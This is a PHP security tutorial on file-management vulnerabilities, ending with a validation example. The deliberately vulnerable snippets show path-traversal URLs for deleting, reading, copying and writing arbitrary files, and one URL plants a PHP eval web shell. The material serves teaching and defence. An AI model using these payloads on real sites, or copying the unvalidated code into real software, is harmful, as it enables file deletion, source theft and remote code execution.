# File Management Vulnerabilities

PHP's file-management functions can become high-risk vulnerabilities when their input variables can be submitted by the user and the program performs no data validation.

Common functions: copy, rmdir, unlink, delete, fwrite, chmod, fgetc, fgetcsv, fgets, fgetss, file, file\_get\_contents, fread, readfile, ftruncate, file\_put\_contents, fputcsv, fputs, fopen

Operations: add, delete, write, modify

unlink

```php
// test.php?f=../../demo.php
$file = $_GET['f'];   // user-controlled path, no validation
if (is_file($file)) {
    unlink($file);    // deletes whatever file the path resolves to
}
```

file\_get\_contents

```php
// test.php?f=../../demo.php
$file = $_GET['f'];
echo file_get_contents($file);
// Nothing is shown on the rendered page, but demo.php's source code can be seen with the browser's view-source
```

readfile

```php
// test.php?f=../../demo.php
$file = $_GET['f'];
echo readfile($file);
// Prints the length of demo.php; the content is not shown on the page, but demo.php's source code can be seen with the browser's view-source
```

file\_put\_contents

```php
/* test.php?f=../../demo.php&text=<?php eval($_POST['CMD'])?> */
$file = $_GET['f'];
$text = $_GET['text'];   // user-controlled content
file_put_contents($file, $text);
```

copy

```php
// test.php?f=../../demo.php&text=demo2.php
$file = $_GET['f'];
$text = $_GET['text'];   // user-controlled destination
copy($file, $text);
```

```php
// test.php?f=../../demo.php
$file = $_GET['f'];
fwrite(fopen($file, 'a+'), '<?php phpinfo();?>');
```
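Every snippet above passes `$_GET['f']` straight to a file function. The following is an added example, not code from the original page, of the data validation the page says is missing: it confines a user-supplied name to one base directory and to an extension allow-list before any file function sees it. The function name `safe_path`, the `data` directory and the allowed extensions are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Added example: resolve a user-supplied name inside $baseDir, or return null.
// safe_path() and the extension allow-list are hypothetical, not from the page.
function safe_path(string $baseDir, string $userPath, array $allowedExt = ['txt', 'log']): ?string
{
    $base = realpath($baseDir);
    if ($base === false || $userPath === '' || strpos($userPath, "\0") !== false) {
        return null;
    }
    // Resolve the parent directory, because a write target may not exist yet.
    $candidate = $base . DIRECTORY_SEPARATOR . $userPath;
    $parent = realpath(dirname($candidate));
    $name = basename($candidate);
    if ($parent === false || $name === '.' || $name === '..') {
        return null;
    }
    $full = $parent . DIRECTORY_SEPARATOR . $name;
    // If the final component exists (or is a symlink), resolve it as well.
    if (file_exists($full) || is_link($full)) {
        $full = realpath($full);
        if ($full === false) {
            return null;
        }
    }
    // Containment check; the trailing separator stops "/data" matching "/data2".
    if (strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    // Allow-list of extensions so a write can never create an executable .php file.
    $ext = strtolower(pathinfo($full, PATHINFO_EXTENSION));
    return in_array($ext, $allowedExt, true) ? $full : null;
}

// Constructed demo tree in a temporary directory.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'fm_demo_' . uniqid();
mkdir($root . DIRECTORY_SEPARATOR . 'data', 0700, true);
file_put_contents($root . DIRECTORY_SEPARATOR . 'demo.php', '<?php // application source');
file_put_contents($root . DIRECTORY_SEPARATOR . 'data' . DIRECTORY_SEPARATOR . 'notes.txt', 'hello');

// Constructed inputs standing in for $_GET['f'].
foreach (['notes.txt', 'new.txt', '../demo.php', 'shell.php'] as $f) {
    $path = safe_path($root . DIRECTORY_SEPARATOR . 'data', $f);
    printf("%-12s => %s\n", $f, $path === null ? 'rejected' : 'allowed');
}
```

Pass only the returned path to `unlink`, `readfile`, `file_put_contents` and the other functions listed above, never the raw request value.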